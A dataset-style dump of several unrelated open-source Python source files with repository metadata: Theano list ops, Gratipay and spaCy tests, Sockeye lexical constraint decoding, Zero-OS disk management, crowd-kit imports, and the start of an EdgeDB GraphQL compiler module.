((npy_int64*)PyArray_DATA(%(output_name)s))[0]=PyList_Size((PyObject*)%(x_name)s); Py_INCREF(%(output_name)s); """ % locals() ) def c_code_cache_version(self): return (1,) length = Length() """ Returns the size of a list. Parameters ---------- x Typed list. """ class MakeList(Op): __props__ = () def make_node(self, a): assert isinstance(a, (tuple, list)) a2 = [] for elem in a: if not isinstance(elem, theano.gof.Variable): elem = theano.tensor.as_tensor_variable(elem) a2.append(elem) if not all(a2[0].type == elem.type for elem in a2): raise TypeError("MakeList need all input variable to be of the same type.") tl = theano.typed_list.TypedListType(a2[0].type)() return Apply(self, a2, [tl]) def perform(self, node, inputs, outputs): (out,) = outputs # We need to make sure that we don't get a view on our inputs out[0] = [_lessbroken_deepcopy(inp) for inp in inputs] make_list = MakeList() """ Build a Python list from those Theano variable. Parameters ---------- a : tuple/list of Theano variable Notes ----- All Theano variables must have the same type. """
26.614826
133
0.551253
a123565e0a473b72f9d3347219d699f273753192
2,566
py
Python
tests/py/test_communities.py
webmaven/gratipay.com
31f6bcf903029895a4c56290aedde755e852c82f
[ "CC0-1.0" ]
1
2019-10-09T10:13:53.000Z
2019-10-09T10:13:53.000Z
tests/py/test_communities.py
webmaven/gratipay.com
31f6bcf903029895a4c56290aedde755e852c82f
[ "CC0-1.0" ]
null
null
null
tests/py/test_communities.py
webmaven/gratipay.com
31f6bcf903029895a4c56290aedde755e852c82f
[ "CC0-1.0" ]
null
null
null
from __future__ import absolute_import, division, print_function, unicode_literals from gratipay.testing import Harness class Tests(Harness): def setUp(self): Harness.setUp(self) # Alice joins a community. self.alice = self.make_participant("alice", claimed_time='now', last_bill_result='') self.client.POST( '/for/communities.json' , {'name': 'something', 'is_member': 'true'} , auth_as='alice' ) def test_community_member_shows_up_on_community_listing(self): html = self.client.GET('/for/something/', want='response.body') assert html.count('alice') == 2 # entry in New Participants def test_givers_show_up_on_community_page(self): # Alice tips bob. bob = self.make_participant('bob', claimed_time='now') self.alice.set_tip_to(bob, '1.00') html = self.client.GET('/for/something/', want='response.body') assert html.count('alice') == 4 # entries in both New Participants and Givers assert 'bob' not in html def test_givers_dont_show_up_if_they_give_zero(self): # Alice tips bob. bob = self.make_participant('bob', claimed_time='now') self.alice.set_tip_to(bob, '1.00') self.alice.set_tip_to(bob, '0.00') html = self.client.GET('/for/something/', want='response.body') assert html.count('alice') == 2 # entry in New Participants only assert 'bob' not in html def test_receivers_show_up_on_community_page(self): # Bob tips alice. bob = self.make_participant("bob", claimed_time='now', last_bill_result='') bob.set_tip_to(self.alice, '1.00') html = self.client.GET('/for/something/', want='response.body') assert html.count('alice') == 4 # entries in both New Participants and Receivers assert 'bob' not in html def test_receivers_dont_show_up_if_they_receive_zero(self): # Bob tips alice. bob = self.make_participant("bob", claimed_time='now', last_bill_result='') bob.set_tip_to(self.alice, '1.00') bob.set_tip_to(self.alice, '0.00') # zero out bob's tip html = self.client.GET('/for/something/', want='response.body') assert html.count('alice') == 2 # entry in New Participants only assert 'bob' not in html def test_community_listing_works_for_pristine_community(self): html = self.client.GET('/for/pristine/', want='response.body') assert 'first one here' in html
38.298507
92
0.641076
6b9f8a72b072dc7b30c9a5d98f4e41f96f7135da
475
py
Python
spacy/tests/lang/hr/test_lemma.py
jaydeepborkar/spaCy
16aa092fb5cffb5ec7079951ea0c04cb96733b3e
[ "MIT" ]
1
2020-01-29T19:02:04.000Z
2020-01-29T19:02:04.000Z
spacy/tests/lang/hr/test_lemma.py
jaydeepborkar/spaCy
16aa092fb5cffb5ec7079951ea0c04cb96733b3e
[ "MIT" ]
1
2021-08-16T13:39:17.000Z
2021-08-16T13:39:40.000Z
spacy/tests/lang/hr/test_lemma.py
jaydeepborkar/spaCy
16aa092fb5cffb5ec7079951ea0c04cb96733b3e
[ "MIT" ]
null
null
null
# coding: utf-8 from __future__ import unicode_literals import pytest @pytest.mark.parametrize( "string,lemma", [ ("trčao", "trčati"), ("adekvatnim", "adekvatan"), ("dekontaminacijama", "dekontaminacija"), ("filologovih", "filologov"), ("je", "biti"), ("se", "sebe"), ], ) def test_hr_lemmatizer_lookup_assigns(hr_tokenizer, string, lemma): tokens = hr_tokenizer(string) assert tokens[0].lemma_ == lemma
22.619048
67
0.612632
2500c43c5e6f390a46ae0ff53464de95586d2b77
28,775
py
Python
sockeye/lexical_constraints.py
tholiao/sockeye
f33b600dc77ae9f295c05015e2af9045f3a74088
[ "Apache-2.0" ]
8
2019-10-02T09:14:31.000Z
2020-07-07T09:40:04.000Z
sockeye/lexical_constraints.py
tholiao/sockeye
f33b600dc77ae9f295c05015e2af9045f3a74088
[ "Apache-2.0" ]
2
2021-03-07T08:34:42.000Z
2021-03-25T22:57:37.000Z
sockeye/lexical_constraints.py
tholiao/sockeye
f33b600dc77ae9f295c05015e2af9045f3a74088
[ "Apache-2.0" ]
4
2019-10-10T06:34:41.000Z
2021-07-19T09:11:20.000Z
# Copyright 2018 Amazon.com, Inc. or its affiliates. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"). You may not # use this file except in compliance with the License. A copy of the License # is located at # # http://aws.amazon.com/apache2.0/ # # or in the "license" file accompanying this file. This file is distributed on # an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either # express or implied. See the License for the specific language governing # permissions and limitations under the License. import copy import logging from operator import attrgetter from typing import Dict, List, Optional, Tuple, Set import mxnet as mx import numpy as np logger = logging.getLogger(__name__) # Represents a list of raw constraints for a sentence. Each constraint is a list of target-word IDs. RawConstraintList = List[List[int]] class AvoidTrie: """ Represents a set of phrasal constraints for an input sentence. These are organized into a trie. """ def __init__(self, raw_phrases: Optional[RawConstraintList] = None) -> None: self.final_ids = set() # type: Set[int] self.children = {} # type: Dict[int,'AvoidTrie'] if raw_phrases: for phrase in raw_phrases: self.add_phrase(phrase) def __str__(self) -> str: s = '({}'.format(list(self.final_ids)) for child_id in self.children.keys(): s += ' -> {} {}'.format(child_id, self.children[child_id]) s += ')' return s def __len__(self) -> int: """ Returns the number of avoid phrases represented in the trie. """ phrase_count = len(self.final_ids) for child in self.children.values(): phrase_count += len(child) return phrase_count def add_trie(self, trie: 'AvoidTrie', phrase: Optional[List[int]] = None) -> None: self.final_ids |= trie.final() for child_id, child in trie.children.items(): if child_id not in self.children: self.children[child_id] = AvoidTrie() self.children[child_id].add_trie(child) def add_phrase(self, phrase: List[int]) -> None: """ Recursively adds a phrase to this trie node. :param phrase: A list of word IDs to add to this trie node. """ if len(phrase) == 1: self.final_ids.add(phrase[0]) else: next_word = phrase[0] if next_word not in self.children: self.children[next_word] = AvoidTrie() self.step(next_word).add_phrase(phrase[1:]) def step(self, word_id: int) -> Optional['AvoidTrie']: """ Returns the child node along the requested arc. :param phrase: A list of word IDs to add to this trie node. :return: The child node along the requested arc, or None if no such arc exists. """ return self.children.get(word_id, None) def final(self) -> Set[int]: """ Returns the set of final ids at this node. :return: The set of word IDs that end a constraint at this state. """ return self.final_ids class AvoidState: """ Represents the state of a hypothesis in the AvoidTrie. The offset is used to return actual positions in the one-dimensionally-resized array that get set to infinity. :param avoid_trie: The trie containing the phrases to avoid. :param state: The current state (defaults to root). """ def __init__(self, avoid_trie: AvoidTrie, state: AvoidTrie = None) -> None: self.root = avoid_trie self.state = state if state else self.root def consume(self, word_id: int) -> 'AvoidState': """ Consumes a word, and updates the state based on it. Returns new objects on a state change. The next state for a word can be tricky. Here are the cases: (1) If the word is found in our set of outgoing child arcs, we take that transition. (2) If the word is not found, and we are not in the root state, we need to reset. This means we pretend we were in the root state, and see if we can take a step (3) Otherwise, if we are not already in the root state (i.e., we were partially through the trie), we need to create a new object whose state is the root state (4) Finally, if we couldn't advance and were already in the root state, we can reuse this object. :param word_id: The word that was just generated. """ if word_id in self.state.children: return AvoidState(self.root, self.state.step(word_id)) elif word_id in self.root.children: return AvoidState(self.root, self.root.step(word_id)) elif self.state != self.root: return AvoidState(self.root, self.root) else: return self def avoid(self) -> Set[int]: """ Returns a set of word IDs that should be avoided. This includes the set of final states from the root node, which are single tokens that must never be generated. :return: A set of integers representing words that must not be generated next by this hypothesis. """ return self.root.final() | self.state.final() def __str__(self) -> str: return str(self.state) class AvoidBatch: """ Represents a set of phrasal constraints for all items in the batch. For each hypotheses, there is an AvoidTrie tracking its state. :param batch_size: The batch size. :param beam_size: The beam size. :param avoid_list: The list of lists (raw phrasal constraints as IDs, one for each item in the batch). :param global_avoid_trie: A translator-level vocabulary of items to avoid. """ def __init__(self, batch_size: int, beam_size: int, avoid_list: Optional[List[RawConstraintList]] = None, global_avoid_trie: Optional[AvoidTrie] = None) -> None: self.global_avoid_states = [] # type: List[AvoidState] self.local_avoid_states = [] # type: List[AvoidState] # Store the global trie for each hypothesis if global_avoid_trie is not None: self.global_avoid_states = [AvoidState(global_avoid_trie)] * batch_size * beam_size # Store the sentence-level tries for each item in their portions of the beam if avoid_list is not None: for raw_phrases in avoid_list: self.local_avoid_states += [AvoidState(AvoidTrie(raw_phrases))] * beam_size def reorder(self, indices: mx.nd.NDArray) -> None: """ Reorders the avoid list according to the selected row indices. This can produce duplicates, but this is fixed if state changes occur in consume(). :param indices: An mx.nd.NDArray containing indices of hypotheses to select. """ if self.global_avoid_states: self.global_avoid_states = [self.global_avoid_states[x] for x in indices.asnumpy()] if self.local_avoid_states: self.local_avoid_states = [self.local_avoid_states[x] for x in indices.asnumpy()] def consume(self, word_ids: mx.nd.NDArray) -> None: """ Consumes a word for each trie, updating respective states. :param word_ids: The set of word IDs. """ word_ids = word_ids.asnumpy().tolist() for i, word_id in enumerate(word_ids): if self.global_avoid_states: self.global_avoid_states[i] = self.global_avoid_states[i].consume(word_id) if self.local_avoid_states: self.local_avoid_states[i] = self.local_avoid_states[i].consume(word_id) def avoid(self) -> Tuple[Tuple[int], Tuple[int]]: """ Assembles a list of per-hypothesis words to avoid. The indices are (x, y) pairs into the scores array, which has dimensions (beam_size, target_vocab_size). These values are then used by the caller to set these items to np.inf so they won't be selected. Words to be avoided are selected by consulting both the global trie of phrases and the sentence-specific one. :return: Two lists of indices: the x coordinates and y coordinates. """ to_avoid = set() # type: Set[Tuple[int, int]] for i, state in enumerate(self.global_avoid_states): for word_id in state.avoid(): if word_id > 0: to_avoid.add((i, word_id)) for i, state in enumerate(self.local_avoid_states): for word_id in state.avoid(): if word_id > 0: to_avoid.add((i, word_id)) return tuple(zip(*to_avoid)) # type: ignore class ConstrainedHypothesis: """ Represents a set of words and phrases that must appear in the output. A constraint is of two types: sequence or non-sequence. A non-sequence constraint is a single word and can therefore be followed by anything, whereas a sequence constraint must be followed by a particular word (the next word in the sequence). This class also records which constraints have been met. A list of raw constraints is maintained internally as two parallel arrays. The following raw constraint represents two phrases that must appear in the output: 14 and 19 35 14. raw constraint: [[14], [19, 35, 14]] This is represented internally as: constraints: [14 19 35 14] is_sequence: [False False True True] That is, the constraints are simply concatenated, and we maintain a parallel array indicating whether each token ID must be followed by the next token ID. The same token ID can be present any number of times. :param constraint_list: A list of zero or raw constraints (each represented as a list of integers). :param eos_id: The end-of-sentence ID. """ def __init__(self, constraint_list: RawConstraintList, eos_id: int) -> None: # `constraints` records the words of the constraints, as a list (duplicates allowed). # `is_sequence` is a parallel array that records, for each corresponding constraint, # whether the current word is the non-final word of a phrasal constraint. self.constraints = [] # type: List[int] self.is_sequence = [] # type: List[bool] for phrase in constraint_list: self.constraints += phrase self.is_sequence += [True] * len(phrase) self.is_sequence[-1] = False self.eos_id = eos_id # no constraints have been met self.met = [False for x in self.constraints] self.last_met = -1 def __len__(self) -> int: """ :return: The number of constraints. """ return len(self.constraints) def __str__(self) -> str: s = [] for i, word_id in enumerate(self.constraints): s.append(str(word_id) if self.met[i] is False else 'X') if self.is_sequence[i]: s.append('->') return ' '.join(s) def size(self) -> int: """ :return: the number of constraints """ return len(self.constraints) def num_met(self) -> int: """ :return: the number of constraints that have been met. """ return sum(self.met) def num_needed(self) -> int: """ :return: the number of un-met constraints. """ return self.size() - self.num_met() def allowed(self) -> Set[int]: """ Returns the set of constrained words that could follow this one. For unfinished phrasal constraints, it is the next word in the phrase. In other cases, it is the list of all unmet constraints. If all constraints are met, an empty set is returned. :return: The ID of the next required word, or -1 if any word can follow """ items = set() # type: Set[int] # Add extensions of a started-but-incomplete sequential constraint if self.last_met != -1 and self.is_sequence[self.last_met] == 1: word_id = self.constraints[self.last_met + 1] if word_id != self.eos_id or self.num_needed() == 1: items.add(word_id) # Add all constraints that aren't non-initial sequences else: for i, word_id in enumerate(self.constraints): if not self.met[i] and (i == 0 or not self.is_sequence[i - 1]): if word_id != self.eos_id or self.num_needed() == 1: items.add(word_id) return items def finished(self) -> bool: """ Return true if all the constraints have been met. :return: True if all the constraints are met. """ return self.num_needed() == 0 def is_valid(self, wordid) -> bool: """ Ensures </s> is only generated when the hypothesis is completed. :param wordid: The wordid to validate. :return: True if all constraints are already met or the word ID is not the EOS id. """ return self.finished() or wordid != self.eos_id or (self.num_needed() == 1 and self.eos_id in self.allowed()) def advance(self, word_id: int) -> 'ConstrainedHypothesis': """ Updates the constraints object based on advancing on word_id. There is a complication, in that we may have started but not yet completed a multi-word constraint. We need to allow constraints to be added as unconstrained words, so if the next word is invalid, we must "back out" of the current (incomplete) phrase, re-setting all of its words as unmet. :param word_id: The word ID to advance on. :return: A deep copy of the object, advanced on word_id. """ obj = copy.deepcopy(self) # First, check if we're updating a sequential constraint. if obj.last_met != -1 and obj.is_sequence[obj.last_met] == 1: if word_id == obj.constraints[obj.last_met + 1]: # Here, the word matches what we expect next in the constraint, so we update everything obj.met[obj.last_met + 1] = True obj.last_met += 1 else: # Here, the word is not the expected next word of the constraint, so we back out of the constraint. index = obj.last_met while obj.is_sequence[index]: obj.met[index] = False index -= 1 obj.last_met = -1 # If not, check whether we're meeting a single-word constraint else: # Build a list from all constraints of tuples of the # form (constraint, whether it's a non-initial sequential, whether it's been met) constraint_tuples = list(zip(obj.constraints, [False] + obj.is_sequence[:-1], obj.met)) # We are searching for an unmet constraint (word_id) that is not the middle of a phrase and is not met query = (word_id, False, False) try: pos = constraint_tuples.index(query) obj.met[pos] = True obj.last_met = pos except ValueError: # query not found; identical but duplicated object will be returned pass return obj def init_batch(raw_constraints: List[Optional[RawConstraintList]], beam_size: int, start_id: int, eos_id: int) -> List[Optional[ConstrainedHypothesis]]: """ :param raw_constraints: The list of raw constraints (list of list of IDs). :param beam_size: The beam size. :param start_id: The target-language vocabulary ID of the SOS symbol. :param eos_id: The target-language vocabulary ID of the EOS symbol. :return: A list of ConstrainedHypothesis objects (shape: (batch_size * beam_size,)). """ constraints = [None] * (len(raw_constraints) * beam_size) # type: List[Optional[ConstrainedHypothesis]] if any(raw_constraints): for i, raw_list in enumerate(raw_constraints): num_constraints = sum([len(phrase) for phrase in raw_list]) if raw_list is not None else 0 if num_constraints > 0: hyp = ConstrainedHypothesis(raw_list, eos_id) idx = i * beam_size constraints[idx:idx + beam_size] = [hyp.advance(start_id) for x in range(beam_size)] return constraints def get_bank_sizes(num_constraints: int, beam_size: int, candidate_counts: List[int]) -> List[int]: """ Evenly distributes the beam across the banks, where each bank is a portion of the beam devoted to hypotheses having met the same number of constraints, 0..num_constraints. After the assignment, banks with more slots than candidates are adjusted. :param num_constraints: The number of constraints. :param beam_size: The beam size. :param candidate_counts: The empirical counts of number of candidates in each bank. :return: A distribution over banks. """ num_banks = num_constraints + 1 bank_size = beam_size // num_banks remainder = beam_size - bank_size * num_banks # Distribute any remainder to the end assigned = [bank_size for x in range(num_banks)] assigned[-1] += remainder # Now, moving right to left, push extra allocation to earlier buckets. # This encodes a bias for higher buckets, but if no candidates are found, space # will be made in lower buckets. This may not be the best strategy, but it is important # that you start pushing from the bucket that is assigned the remainder, for cases where # num_constraints >= beam_size. for i in reversed(range(num_banks)): overfill = assigned[i] - candidate_counts[i] if overfill > 0: assigned[i] -= overfill assigned[(i - 1) % num_banks] += overfill return assigned class ConstrainedCandidate: """ Object used to hold candidates for the beam in topk(). :param row: The row in the scores matrix. :param col: The column (word ID) in the scores matrix. :param score: the associated accumulated score. :param hypothesis: The ConstrainedHypothesis containing information about met constraints. """ __slots__ = ('row', 'col', 'score', 'hypothesis') def __init__(self, row: int, col: int, score: float, hypothesis: ConstrainedHypothesis) -> None: self.row = row self.col = col self.score = score self.hypothesis = hypothesis def __hash__(self): return hash((self.row, self.col)) def __eq__(self, other): return self.row == other.row and self.col == other.col def __str__(self): return '({}, {}, {}, {})'.format(self.row, self.col, self.score, self.hypothesis.num_met()) def topk(timestep: int, batch_size: int, beam_size: int, inactive: mx.nd.NDArray, scores: mx.nd.NDArray, hypotheses: List[ConstrainedHypothesis], best_ids: mx.nd.NDArray, best_word_ids: mx.nd.NDArray, seq_scores: mx.nd.NDArray) -> Tuple[np.array, np.array, np.array, List[ConstrainedHypothesis], mx.nd.NDArray]: """ Builds a new topk list such that the beam contains hypotheses having completed different numbers of constraints. These items are built from three different types: (1) the best items across the whole scores matrix, (2) the set of words that must follow existing constraints, and (3) k-best items from each row. :param timestep: The current decoder timestep. :param batch_size: The number of segments in the batch. :param beam_size: The length of the beam for each segment. :param inactive: Array listing inactive rows (shape: (beam_size,)). :param scores: The scores array (shape: (batch_size if t==1 else beam_size, target_vocab_size)). :param hypotheses: The list of hypothesis objects. :param best_ids: The current list of best hypotheses (shape: (beam_size,)). :param best_word_ids: The parallel list of best word IDs (shape: (beam_size,)). :param seq_scores: (shape: (beam_size, 1)). :return: A tuple containing the best hypothesis rows, the best hypothesis words, the scores, the updated constrained hypotheses, and the updated set of inactive hypotheses. """ for sentno in range(batch_size): rows = slice(sentno * beam_size, sentno * beam_size + beam_size) if hypotheses[rows.start] is not None and hypotheses[rows.start].size() > 0: best_ids[rows], best_word_ids[rows], seq_scores[rows], \ hypotheses[rows], inactive[rows] = _sequential_topk(timestep, beam_size, inactive[rows], scores[rows], hypotheses[rows], best_ids[rows] - rows.start, best_word_ids[rows], seq_scores[rows]) # offsetting since the returned smallest_k() indices were slice-relative best_ids[rows] += rows.start else: # If there are no constraints for this sentence in the batch, everything stays # the same, except we need to mark all hypotheses as active inactive[rows] = 0 return best_ids, best_word_ids, seq_scores, hypotheses, inactive def _sequential_topk(timestep: int, beam_size: int, inactive: mx.nd.NDArray, scores: mx.nd.NDArray, hypotheses: List[ConstrainedHypothesis], best_ids: mx.nd.NDArray, best_word_ids: mx.nd.NDArray, sequence_scores: mx.nd.NDArray) -> Tuple[np.array, np.array, np.array, List[ConstrainedHypothesis], mx.nd.NDArray]: """ Builds a new topk list such that the beam contains hypotheses having completed different numbers of constraints. These items are built from three different types: (1) the best items across the whole scores matrix, (2) the set of words that must follow existing constraints, and (3) k-best items from each row. :param timestep: The current decoder timestep. :param beam_size: The length of the beam for each segment. :param inactive: Array listing inactive rows (shape: (beam_size,)). :param scores: The scores array (shape: (beam_size, target_vocab_size)). :param hypotheses: The list of hypothesis objects. :param best_ids: The current list of best hypotheses (shape: (beam_size,)). :param best_word_ids: The parallel list of best word IDs (shape: (beam_size,)). :param sequence_scores: (shape: (beam_size, 1)). :return: A tuple containing the best hypothesis rows, the best hypothesis words, the scores, the updated constrained hypotheses, and the updated set of inactive hypotheses. """ num_constraints = hypotheses[0].size() candidates = set() # (1) Add all of the top-k items (which were passed) in as long as they pass the constraints for row, col, seq_score in zip(best_ids, best_word_ids, sequence_scores): row = int(row.asscalar()) col = int(col.asscalar()) if hypotheses[row] is not None and hypotheses[row].is_valid(col): seq_score = float(seq_score.asscalar()) new_item = hypotheses[row].advance(col) cand = ConstrainedCandidate(row, col, seq_score, new_item) candidates.add(cand) # For each hypothesis, we add (2) all the constraints that could follow it and # (3) the best item (constrained or not) in that row best_next = mx.nd.argmin(scores, axis=1) for row in range(beam_size): if inactive[row]: continue hyp = hypotheses[row] # (2) add all the constraints that could extend this nextones = hyp.allowed() # (3) add the single-best item after this (if it's valid) col = int(best_next[row].asscalar()) if hyp.is_valid(col): nextones.add(col) # Now, create new candidates for each of these items for col in nextones: new_item = hyp.advance(col) score = scores[row, col].asscalar() cand = ConstrainedCandidate(row, col, score, new_item) candidates.add(cand) # Sort the candidates. After allocating the beam across the banks, we will pick the top items # for each bank from this list sorted_candidates = sorted(candidates, key=attrgetter('score')) # The number of hypotheses in each bank counts = [0 for _ in range(num_constraints + 1)] for cand in sorted_candidates: counts[cand.hypothesis.num_met()] += 1 # Adjust allocated bank sizes if there are too few candidates in any of them bank_sizes = get_bank_sizes(num_constraints, beam_size, counts) # Sort the candidates into the allocated banks pruned_candidates = [] # type: List[ConstrainedCandidate] for i, cand in enumerate(sorted_candidates): bank = cand.hypothesis.num_met() if bank_sizes[bank] > 0: pruned_candidates.append(cand) bank_sizes[bank] -= 1 num_pruned_candidates = len(pruned_candidates) inactive[:num_pruned_candidates] = 0 # Pad the beam so array assignment still works if num_pruned_candidates < beam_size: inactive[num_pruned_candidates:] = 1 pruned_candidates += [pruned_candidates[num_pruned_candidates - 1]] * (beam_size - num_pruned_candidates) return (np.array([x.row for x in pruned_candidates]), np.array([x.col for x in pruned_candidates]), np.array([[x.score] for x in pruned_candidates]), [x.hypothesis for x in pruned_candidates], inactive) def main(args): """ Usage: python3 -m sockeye.lexical_constraints [--bpe BPE_MODEL] Reads sentences and constraints on STDIN (tab-delimited) and generates the JSON format that can be used when passing `--json-input` to sockeye.translate. It supports both positive constraints (phrases that must appear in the output) and negative constraints (phrases that must *not* appear in the output). e.g., echo -e "Das ist ein Test .\tThis is\ttest" | python3 -m sockeye.lexical_constraints will produce the following JSON object: { "text": "Das ist ein Test .", "constraints": ["This is", "test"] } If you pass `--avoid` to the script, the constraints will be generated as negative constraints, instead: echo -e "Das ist ein Test .\tThis is\ttest" | python3 -m sockeye.lexical_constraints --avoid will produce the following JSON object (note the new keyword): { "text": "Das ist ein Test .", "avoid": ["This is", "test"] } Make sure you apply all preprocessing (tokenization, BPE, etc.) to both the source and the target-side constraints. You can then translate this object by passing it to Sockeye on STDIN as follows: python3 -m sockeye.translate -m /path/to/model --json-input --beam-size 20 --beam-prune 20 Note the recommended Sockeye parameters. Beam pruning isn't needed for negative constraints. """ import sys import json for line in sys.stdin: line = line.rstrip() # Constraints are in fields 2+ source, *restrictions = line.split('\t') obj = {'text': source} constraints = [] avoid_list = [] for item in restrictions: if args.avoid: avoid_list.append(item) else: constraints.append(item) if constraints: obj['constraints'] = constraints if avoid_list: obj['avoid'] = avoid_list print(json.dumps(obj, ensure_ascii=False), flush=True) if __name__ == '__main__': import argparse parser = argparse.ArgumentParser() parser.add_argument('--avoid', action='store_true', help='Constraints are negative constraints') args = parser.parse_args() main(args)
40.990028
119
0.625856
47dd13a1f9a3cacc2e773f17563dcf302f925b6e
5,932
py
Python
sandbox/lib/jumpscale/JumpscaleLibsExtra/sal_zos/disks/Disks.py
threefoldtech/threebot_prebuilt
1f0e1c65c14cef079cd80f73927d7c8318755c48
[ "Apache-2.0" ]
1
2020-10-05T08:53:57.000Z
2020-10-05T08:53:57.000Z
sandbox/lib/jumpscale/JumpscaleLibsExtra/sal_zos/disks/Disks.py
threefoldtech/threebot_prebuilt
1f0e1c65c14cef079cd80f73927d7c8318755c48
[ "Apache-2.0" ]
17
2019-11-14T08:41:37.000Z
2020-05-27T09:23:51.000Z
sandbox/lib/jumpscale/JumpscaleLibsExtra/sal_zos/disks/Disks.py
threefoldtech/threebot_prebuilt
1f0e1c65c14cef079cd80f73927d7c8318755c48
[ "Apache-2.0" ]
null
null
null
from enum import Enum from ..abstracts import Mountable from .Partition import Partition from Jumpscale import j class StorageType(Enum): SSD = "SSD" HDD = "HDD" NVME = "NVME" ARCHIVE = "ARCHIVE" CDROM = "CDROM" class Disks: """Subobject to list disks""" def __init__(self, node): self.node = node @property def client(self): return self.node.client def list(self): """ List of disks on the node """ disks = [] for disk_info in self.client.disk.list(): disks.append(Disk(node=self.node, disk_info=disk_info)) return disks def get(self, name): """ return the disk called `name` @param name: name of the disk """ for disk in self.list(): if disk.name == name: return disk return None def get_device(self, name): """ Get device can be either disk or partition @param name: partition or disk name @type name: str @return: Disk or Partition @rtype: Disk Partition """ for disk in self.list(): if disk.devicename == name: return disk for partition in disk.partitions: if partition.devicename == name: return partition raise j.exceptions.NotFound("Could not find device with name {}".format(name)) class Disk(Mountable): """Disk in a Zero-OS""" def __init__(self, node, disk_info): """ disk_info: dict returned by client.disk.list() """ # g8os client to talk to the node Mountable.__init__(self) self.node = node self.name = None self.size = None self.blocksize = None self.partition_table = None self.mountpoint = None self.model = None self._filesystems = [] self._type = None self.partitions = [] self.transport = None self._disk_info = disk_info self._load(disk_info) @property def client(self): return self.node.client @property def devicename(self): return "/dev/{}".format(self.name) @property def filesystems(self): self._populate_filesystems() return self._filesystems @property def type(self): """ return the type of the disk """ if self._type is None: if self._disk_info["type"] == "rom": self._type = StorageType.CDROM else: res = self.node.client.disk.seektime(self.devicename) # assume that if a disk is more than 7TB it's a SMR disk if res["type"] == "HDD": if int(self._disk_info["size"]) > (1024 * 1024 * 1024 * 1024 * 7): self._type = StorageType.ARCHIVE else: self._type = StorageType.HDD elif res["type"] in ["SSD", "SDD"]: if "nvme" in self._disk_info["name"]: self._type = StorageType.NVME else: self._type = StorageType.SSD return self._type def _load(self, disk_info): self.name = disk_info["name"] self.size = int(disk_info["size"]) self.blocksize = disk_info["blocksize"] if "blocksize" in disk_info else None if "table" in disk_info and disk_info["table"] != "unknown": self.partition_table = disk_info["table"] self.mountpoint = disk_info["mountpoint"] self.model = disk_info["model"] self.transport = disk_info["tran"] for partition_info in disk_info.get("children", []) or []: self.partitions.append(Partition(disk=self, part_info=partition_info)) def _populate_filesystems(self): """ look into all the btrfs filesystem and populate the filesystems attribute of the class with the detail of all the filesystem present on the disk """ disk_devices_names = [self.devicename] disk_devices_names.extend([part.devicename for part in self.partitions]) self._filesystems = [] for fs in self.client.btrfs.list() or []: for device in fs["devices"]: if device["path"] in disk_devices_names: self._filesystems.append(fs) def mktable(self, table_type="gpt", overwrite=False): """ create a partition table on the disk @param table_type: Partition table type as accepted by parted @param overwrite: erase any existing partition table """ if self.partition_table is not None and overwrite is False: return self.client.disk.mktable(disk=self.name, table_type=table_type) def mkpart(self, start, end, part_type="primary"): """ @param start: partition start as accepted by parted mkpart @param end: partition end as accepted by parted mkpart @param part_type: partition type as accepted by parted mkpart """ before = {p.name for p in self.partitions} self.client.disk.mkpart(self.name, start=start, end=end, part_type=part_type) after = {} for disk in self.client.disk.list(): if disk["name"] != self.name: continue for part in disk.get("children", []): after[part["name"]] = part name = set(after.keys()) - before part_info = after[list(name)[0]] partition = Partition(disk=self, part_info=part_info) self.partitions.append(partition) return partition def __str__(self): return "Disk <{}>".format(self.name) def __repr__(self): return str(self) def __eq__(self, other): return self.devicename == other.devicename
30.57732
86
0.568105
667bcf9e07a82b5019713d95c61d2a69286d7b9b
249
py
Python
build/lib/crowdkit/aggregation/image_segmentation/__init__.py
artinmajdi/crowd-kit
174e15f256a4929ed71699ffc1797ea87e0e8a99
[ "Apache-2.0" ]
91
2021-03-02T19:29:04.000Z
2022-03-24T15:25:06.000Z
build/lib/crowdkit/aggregation/image_segmentation/__init__.py
artinmajdi/crowd-kit
174e15f256a4929ed71699ffc1797ea87e0e8a99
[ "Apache-2.0" ]
5
2021-07-01T07:24:08.000Z
2021-09-19T19:15:40.000Z
src/aggregation/image_segmentation/__init__.py
Toloka/crowd-kit
126942242781073235ca292aed9f496b614e9516
[ "Apache-2.0" ]
6
2021-05-21T12:40:29.000Z
2022-03-28T06:23:24.000Z
from .segmentation_em import SegmentationEM from .segmentation_rasa import SegmentationRASA from .segmentation_majority_vote import SegmentationMajorityVote __all__ = [ 'SegmentationEM', 'SegmentationRASA', 'SegmentationMajorityVote' ]
24.9
64
0.815261
31c224b008de2a99bcc894b8a0b8c31a9b450a16
3,690
py
Python
edb/server/http_graphql_port/compiler.py
pnijhara/edgedb
04e47118ef4d2af5dca1a6bd937bb737873329c9
[ "Apache-2.0" ]
4
2020-04-25T13:52:13.000Z
2020-09-23T19:14:07.000Z
edb/server/http_graphql_port/compiler.py
pnijhara/edgedb
04e47118ef4d2af5dca1a6bd937bb737873329c9
[ "Apache-2.0" ]
null
null
null
edb/server/http_graphql_port/compiler.py
pnijhara/edgedb
04e47118ef4d2af5dca1a6bd937bb737873329c9
[ "Apache-2.0" ]
null
null
null
# # This source file is part of the EdgeDB open source project. # # Copyright 2019-present MagicStack Inc. and the EdgeDB authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # from __future__ import annotations from typing import * import dataclasses import immutables from edb import errors from edb import graphql from edb.common import debug from edb.edgeql import compiler as qlcompiler from edb.pgsql import compiler as pg_compiler from edb.server import compiler if TYPE_CHECKING: from edb.schema import schema as s_schema @dataclasses.dataclass(frozen=True) class CompilerDatabaseState(compiler.CompilerDatabaseState): gqlcore: graphql.GQLCoreSchema @dataclasses.dataclass(frozen=True) class CompiledOperation: sql: bytes sql_hash: bytes sql_args: List[str] dbver: int cacheable: bool cache_deps_vars: Optional[FrozenSet[str]] variables: Dict class Compiler(compiler.BaseCompiler): def _wrap_schema( self, dbver: int, schema: s_schema.Schema, cached_reflection: immutables.Map[str, Tuple[str, ...]], ) -> CompilerDatabaseState: gqlcore = graphql.GQLCoreSchema(schema) return CompilerDatabaseState( dbver=dbver, schema=schema, cached_reflection=cached_reflection, gqlcore=gqlcore, ) async def compile_graphql( self, dbver: 